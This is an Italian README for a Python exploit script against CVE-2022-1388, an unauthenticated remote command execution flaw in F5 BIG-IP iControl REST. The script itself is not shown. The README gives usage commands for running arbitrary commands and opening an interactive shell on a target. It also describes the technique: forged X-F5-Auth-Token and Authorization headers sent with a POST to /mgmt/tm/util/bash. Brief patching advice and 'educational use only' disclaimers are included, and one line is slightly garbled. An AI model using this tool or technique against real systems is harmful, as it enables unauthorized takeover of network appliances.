
Questo script Python sfrutta CVE-2022-1388, una vulnerabilità critica in F5 BIG-IP iControl REST che consente l'esecuzione remota di comandi senza autenticazione tramite un controllo degli accessi improprio e una gestione non corretta delle intestazioni HTTP.
⚠️ Solo per ricerca sulla sicurezza autorizzata e a scopo educativo. Non utilizzare su sistemi che non possiedi o per i quali non hai esplicito permesso di test.
--shell)python3 cve_2022_1388_exploit.py -u <target_url> -c "<command>"
python3 cve_2022_1388_exploit.py -u https://192.168.1.1 -c "id"
python3 cve_2022_1388_exploit.py -u https://192.168.1.1 -a "root:password" -c "whoami"
python3 cve_2022_1388_exploit.py -u https://192.168.1.1 --shell
Lo script aggira l'autenticazione impostando intestazioni X-F5-Auth-Token e Authorization contraffatte.
Invia una richiesta POST a: /mgmt/tm/util/bash
Il payload attiva l'esecuzione del comando shell specificato.
Aggiornare alle versioni patchate di F5 BIG-IP come raccomandato dall'F5 Security Advisory.
Limitare l'accesso all'interfaccia iControl REST.
Questo script di exploit è fornito solo a scopo educativo. L'utilizzo è interamente a proprio rischio.